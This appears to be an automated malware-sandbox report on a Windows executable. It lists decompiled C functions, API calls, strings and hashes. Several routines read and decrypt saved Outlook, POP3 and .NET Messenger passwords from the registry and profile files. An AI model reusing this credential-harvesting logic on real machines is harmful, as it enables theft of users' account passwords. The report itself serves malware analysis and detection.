memset.MSVCRT ref: 00402C84

Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28

RegCloseKey.ADVAPI32(?), ref: 00402D86

Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA

memset.MSVCRT ref: 00402CDE
sprintf.MSVCRT ref: 00402CF7
sprintf.MSVCRT ref: 00402D35

Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C

Strings

Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00402D21
%s\%s, xrefs: 00402CA6, 00402CF5, 00402D33
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00402CE3
Identities, xrefs: 00402C52
Username, xrefs: 00402CB7

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Closememset$sprintf$EnumOpen
String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
API String ID: 1831126014-3814494228
Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B53C, Relevance: 16.6, APIs: 11, Instructions: 133
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t45;
				intOrPtr _t50;
				signed int _t53;
				intOrPtr _t82;
				signed char _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				void* _t92;

				_t84 = __ecx;
				_t88 = _a4;
				_t92 = _t88 - 0x402;
				_t91 = __ecx;
				if(_t92 > 0) {
					_t45 = _t88 - 0x415;
					__eflags = _t45;
					if(_t45 == 0) {
						E0040A4C8(__ecx);
						L22:
						__eflags = 0;
						E0040A27F(0, _t84, _t91, 0);
						L23:
						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
							_t81 = _a12;
							_t86 =  *(_a12 + 0xc);
							_t50 =  *((intOrPtr*)(_t91 + 0x370));
							if((_t86 & 0x00000008) == 0) {
								__eflags = _t86 & 0x00000040;
								if((_t86 & 0x00000040) != 0) {
									 *0x4171ac =  *0x4171ac & 0x00000000;
									__eflags =  *0x4171ac;
									SetFocus( *(_t50 + 0x184));
								}
							} else {
								E00409D7E(_t50, _t81);
							}
						}
						return E004019AC(_t91, _t88, _a8, _a12);
					}
					_t53 = _t45 - 1;
					__eflags = _t53;
					if(_t53 == 0) {
						E0040A56C(__ecx);
						goto L22;
					}
					__eflags = _t53 == 6;
					if(_t53 == 6) {
						SetFocus( *(__ecx + 0x378));
					}
					goto L23;
				}
				if(_t92 == 0) {
					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
					E0040A437(__ecx);
					goto L22;
				}
				if(_t88 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
					} else {
						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
					}
					goto L23;
				}
				if(_t88 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L23;
					}
					SetCursor(LoadCursorA( *0x416b94, 0x67));
					return 1;
				}
				if(_t88 == 0x2b) {
					_t82 = _a12;
					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t82 + 0x18), 1);
						SetTextColor( *(_t82 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t90 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
						SelectObject( *(_t90 + 0x18), _v8);
						_t88 = _a4;
					}
				} else {
					if(_t88 == 0x7b) {
						_t87 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
							E0040B372(__ecx, _t87);
						}
					}
				}
				goto L23;
			}

0x0040b53c
0x0040b545
0x0040b54d
0x0040b54f
0x0040b551
0x0040b689
0x0040b689
0x0040b68e
0x0040b6b1
0x0040b6b6
0x0040b6b6
0x0040b6b8
0x0040b6bd
0x0040b6c3
0x0040b6c5
0x0040b6c8
0x0040b6ce
0x0040b6d4
0x0040b6dd
0x0040b6e0
0x0040b6e8
0x0040b6e8
0x0040b6ef
0x0040b6ef
0x0040b6d6
0x0040b6d6
0x0040b6d6
0x0040b6d4
0x00000000
0x0040b6fe
0x0040b690
0x0040b690
0x0040b691
0x0040b6a8
0x00000000
0x0040b6a8
0x0040b693
0x0040b696
0x0040b69e
0x0040b69e
0x00000000
0x0040b696
0x0040b557
0x0040b679
0x0040b680
0x00000000
0x0040b680
0x0040b560
0x0040b651
0x0040b654
0x0040b671
0x0040b656
0x0040b663
0x0040b663
0x00000000
0x0040b654
0x0040b569
0x0040b626
0x0040b62c
0x00000000
0x00000000
0x0040b641
0x00000000
0x0040b649
0x0040b572
0x0040b59e
0x0040b5a4
0x0040b5aa
0x0040b5b5
0x0040b5c3
0x0040b5da
0x0040b5e2
0x0040b5e3
0x0040b5e4
0x0040b5e5
0x0040b5e6
0x0040b5ff
0x0040b606
0x0040b60d
0x0040b619
0x0040b61b
0x0040b61b
0x0040b574
0x0040b577
0x0040b583
0x0040b58c
0x0040b594
0x0040b594
0x0040b58c
0x0040b577
0x00000000

APIs

SetBkMode.GDI32(?,00000001), ref: 0040B5B5
SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
SelectObject.GDI32(?,?), ref: 0040B5D8
DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
SelectObject.GDI32(00000014,?), ref: 0040B619

Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA

LoadCursorA.USER32 ref: 0040B63A
SetCursor.USER32(00000000), ref: 0040B641
PostMessageA.USER32 ref: 0040B663
SetFocus.USER32(?), ref: 0040B69E
SetFocus.USER32(?), ref: 0040B6EF

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
String ID:
API String ID: 1416211542-0
Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDDB, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E

Strings

Common Programs, xrefs: 0040EE48
Favorites, xrefs: 0040EE0D
Startup, xrefs: 0040EE06
Programs, xrefs: 0040EE14
Desktop, xrefs: 0040EDF8
Common Startup, xrefs: 0040EE41
AppData, xrefs: 0040EE33
Start Menu, xrefs: 0040EDFF
Common Start Menu, xrefs: 0040EE1B
Common Desktop, xrefs: 0040EE3A

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy
String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
API String ID: 3177657795-318151290
Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF

Uniqueness

Uniqueness Score: -1.00%

Function 0040E988, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
memcpy.MSVCRT ref: 0040EA04
CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13

Strings

220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FromStringUuid$FreeTaskmemcpy
String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
API String ID: 1640410171-2022683286
Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404837, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00404837(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryA("comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

0x00404844
0x0040484b
0x00404852
0x00404854
0x0040485c
0x00404860
0x0040488a
0x0040488a
0x00404892
0x00404893
0x00404898
0x004048b5
0x0040489a
0x004048a7
0x004048b0
0x004048b0
0x00404898
0x00404868
0x00404870
0x00404876
0x00404879
0x00404879
0x0040487c
0x00404884
0x00000000
0x00404886
0x00404886
0x00000000
0x00404886

APIs

LoadLibraryA.KERNEL32(comctl32.dll,74784DE0,?,00000000,?,?,?,0040B9C9,74784DE0), ref: 00404856
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,74784DE0), ref: 0040487C
#17.COMCTL32(?,00000000,?,?,?,0040B9C9,74784DE0), ref: 0040488A
MessageBoxA.USER32 ref: 004048A7

Strings

comctl32.dll, xrefs: 0040483F
Error: Cannot load the common control classes., xrefs: 004048A1
Error, xrefs: 0040489C
InitCommonControlsEx, xrefs: 00404862

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040E172, Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040E172(char* __edi, char* __esi) {
				void _v267;
				char _v268;
				char* _t15;
				void* _t38;
				char* _t48;

				_t49 = __esi;
				_t48 = __edi;
				if(__esi[1] != 0x3a) {
					_t15 = strchr( &(__esi[2]), 0x3a);
					if(_t15 == 0) {
						_t38 = E004069D2(0, "\\systemroot");
						if(_t38 < 0) {
							if( *__esi != 0x5c) {
								strcpy(__edi, __esi);
							} else {
								_v268 = 0;
								memset( &_v267, 0, 0x104);
								E00406325( &_v268);
								memcpy(__edi,  &_v268, 2);
								__edi[2] = 0;
								strcat(__edi, __esi);
							}
						} else {
							_v268 = 0;
							memset( &_v267, 0, 0x104);
							E00406325( &_v268);
							strcpy(__edi,  &_v268);
							_t8 =  &(_t49[0xb]); // 0xb
							strcat(__edi, _t38 + _t8);
						}
						L11:
						return _t48;
					}
					_push(_t15 - 1);
					L4:
					strcpy(_t48, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

0x0040e172
0x0040e172
0x0040e17f
0x0040e18a
0x0040e193
0x0040e1b3
0x0040e1b8
0x0040e200
0x0040e249
0x0040e202
0x0040e210
0x0040e217
0x0040e223
0x0040e232
0x0040e239
0x0040e23d
0x0040e242
0x0040e1ba
0x0040e1c8
0x0040e1cf
0x0040e1db
0x0040e1e8
0x0040e1ed
0x0040e1f3
0x0040e1f8
0x0040e251
0x0040e254
0x0040e254
0x0040e196
0x0040e197
0x0040e198
0x00000000
0x0040e19e
0x0040e181
0x00000000

APIs

strchr.MSVCRT ref: 0040E18A
strcpy.MSVCRT(?,-00000001), ref: 0040E198

Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A

strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
memset.MSVCRT ref: 0040E1CF

Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A

memset.MSVCRT ref: 0040E217
memcpy.MSVCRT ref: 0040E232
strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D

Strings

\systemroot, xrefs: 0040E1A5

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
String ID: \systemroot
API String ID: 1680921474-1821301763
Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4A6, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D4A6(char* __ebx, void** _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				char* _v28;
				char _v32;
				char _v556;
				char _v557;
				char _v1578;
				void _v1580;
				void* __edi;
				void* __esi;
				long _t39;
				int _t43;
				char _t48;
				char* _t63;
				int* _t67;

				_t63 = __ebx;
				_t67 = 0;
				_v16 = 0;
				_v12 = 0x400;
				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
				if(_t39 != 0) {
					L13:
					RegCloseKey( *_a4);
					return _v16;
				}
				_t43 = _t39 + 1;
				if(_v12 <= _t43) {
					goto L13;
				}
				_t74 = _v1580 - 0x20;
				_v8 = 0;
				if(_v1580 >= 0x20) {
					_v8 = _t43;
					L10:
					if(_v8 != _t67) {
						_v557 = 0;
						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
						_v8 = 0xff;
						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
						if(_t48 == 0) {
							_t63[0xfe] = _t48;
							_t63[0x1fe] = _t48;
							_v16 = 1;
						}
					}
					goto L13;
				}
				_t69 =  &_v556;
				E004046D7( &_v556);
				if(E004047A0(_t69, _t74) == 0) {
					L8:
					E004047F1( &_v556);
					_t67 = 0;
					goto L10;
				}
				_v32 = _v12 + 0xfffffffe;
				_v28 =  &_v1578;
				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
					goto L8;
				}
				if(_v24 < 0x400) {
					memcpy( &_v1580, _v20, _v24);
					_v8 = 1;
				}
				LocalFree(_v20);
				goto L8;
			}

0x0040d4a6
0x0040d4bf
0x0040d4cf
0x0040d4d2
0x0040d4d5
0x0040d4dd
0x0040d5c7
0x0040d5cc
0x0040d5d8
0x0040d5d8
0x0040d4e3
0x0040d4e7
0x00000000
0x00000000
0x0040d4ed
0x0040d4f4
0x0040d4f7
0x0040d56d
0x0040d570
0x0040d573
0x0040d587
0x0040d58e
0x0040d5a7
0x0040d5aa
0x0040d5b2
0x0040d5b4
0x0040d5ba
0x0040d5c0
0x0040d5c0
0x0040d5b2
0x00000000
0x0040d573
0x0040d4f9
0x0040d4ff
0x0040d50b
0x0040d55e
0x0040d564
0x0040d569
0x00000000
0x0040d569
0x0040d513
0x0040d51c
0x0040d532
0x00000000
0x00000000
0x0040d537
0x0040d546
0x0040d54e
0x0040d54e
0x0040d558
0x00000000

APIs

RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,7614F420), ref: 0040D4D5
RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA

Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726

Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7614F420), ref: 004047A8
Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

memcpy.MSVCRT ref: 0040D546
LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
RegCloseKey.ADVAPI32(?), ref: 0040D5CC

Strings

Password.NET Messenger Service, xrefs: 0040D4C3
, xrefs: 0040D4ED
User.NET Messenger Service, xrefs: 0040D5A0

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
String ID: $Password.NET Messenger Service$User.NET Messenger Service
API String ID: 3289975857-105384665
Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040706C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
				char _v12;
				short* _v16;
				char _v20;
				char* _v24;
				char _v28;
				char _v288;
				char _v544;
				char _v800;
				char _v1056;
				char _v1584;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t36;
				void* _t63;
				char* _t66;
				void* _t68;

				_t63 = __ecx;
				_v2608 = 0;
				memset( &_v2607, 0, 0x3ff);
				_v12 = 0x400;
				_v1056 = 0;
				_v800 = 0;
				_v544 = 0;
				_v288 = 0;
				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
				_t72 = _t36;
				if(_t36 != 0) {
					return _t36;
				}
				_t67 =  &_v1584;
				E004046D7( &_v1584);
				if(E004047A0( &_v1584, _t72) != 0) {
					_v24 =  &_v2608;
					_v28 = _v12;
					_t16 =  &_v20; // 0x407221
					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
						_t19 =  &_v20; // 0x407221
						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
						LocalFree(_v16);
						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
						_t28 =  &_a12; // 0x407221
						_t66 =  &_v1056;
						E004060D0(0xff, _t66,  *_t28);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E004047F1( &_v1584);
			}

0x0040706c
0x00407087
0x0040708d
0x004070a5
0x004070ac
0x004070b2
0x004070b8
0x004070be
0x004070c4
0x004070cc
0x004070ce
0x00407199
0x00407199
0x004070d4
0x004070da
0x004070e6
0x004070f2
0x004070f8
0x004070fb
0x0040710d
0x0040711d
0x00407131
0x00407138
0x00407154
0x0040716a
0x0040716f
0x00407172
0x00407178
0x00407188
0x00407188
0x0040710d
0x00000000

APIs

memset.MSVCRT ref: 0040708D

Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9

Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726

Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7614F420), ref: 004047A8
Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
LocalFree.KERNEL32(?,?,?,?,?,00000000,7614ED80,?), ref: 00407138

Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B

Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA

Strings

!r@, xrefs: 004070FB, 0040711D, 004070FE, 00407122
POP3_host, xrefs: 00407160
!r@, xrefs: 0040716F
POP3_credentials, xrefs: 0040709D
POP3_name, xrefs: 00407145

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
API String ID: 604216836-250559020
Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65

Uniqueness

Uniqueness Score: -1.00%

Function 0040314D, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v188;
				char _v268;
				char _v524;
				void* __ebx;
				void* __edi;
				char* _t53;
				void* _t60;
				void* _t65;
				char* _t70;

				_v8 = _v8 & 0x00000000;
				_t65 = __eax;
				 *((intOrPtr*)(__eax + 0x8c)) = 3;
				 *((intOrPtr*)(__eax + 0x210)) = 1;
				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
				if(_v524 == 0x31) {
					 *((intOrPtr*)(_t65 + 0x210)) = 2;
				}
				_v12 = _t65 + 0x110;
				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
				_t70 = _t65 + 0x214;
				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
				if(_v268 != 0) {
					_v188 = 0;
					E00401D5A( &_v268, _t65 + 0x294);
					if( *_t70 == 0) {
						_push(_a8);
						_t60 = 0x7f;
						_push(_t60);
						_push(_t70);
						_push("PopAccount");
						_push(_a4);
						E0040311F();
						if( *_t70 != 0) {
							_t53 = strchr(_t70, 0x40);
							_a8 = _t53;
							if(_t53 != 0) {
								E004060D0(_t60, _v12,  &(_t53[1]));
								 *_a8 = 0;
							}
						}
					}
					_v8 = 1;
				}
				if( *_t70 != 0) {
					_v8 = 1;
				}
				return _v8;
			}

0x00403156
0x00403160
0x00403177
0x00403181
0x0040318b
0x00403197
0x00403199
0x00403199
0x004031b7
0x004031ba
0x004031c2
0x004031d3
0x004031e9
0x00403202
0x0040321a
0x00403226
0x00403234
0x0040323b
0x00403243
0x00403245
0x0040324a
0x0040324b
0x0040324c
0x0040324d
0x00403252
0x00403255
0x0040325d
0x00403262
0x0040326b
0x0040326e
0x00403275
0x0040327e
0x0040327e
0x0040326e
0x0040325d
0x00403281
0x00403281
0x0040328e
0x00403290
0x00403290
0x0040329b

APIs

Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143

strchr.MSVCRT ref: 00403262

Strings

1, xrefs: 00403190
LoginName, xrefs: 004031CB
PopServer, xrefs: 004031AF
SavePasswordText, xrefs: 00403212
PopAccount, xrefs: 0040324D
UsesIMAP, xrefs: 0040316F
RealName, xrefs: 004031E1
ReturnAddress, xrefs: 004031FA

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfileStringstrchr
String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
API String ID: 1348940319-1729847305
Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54

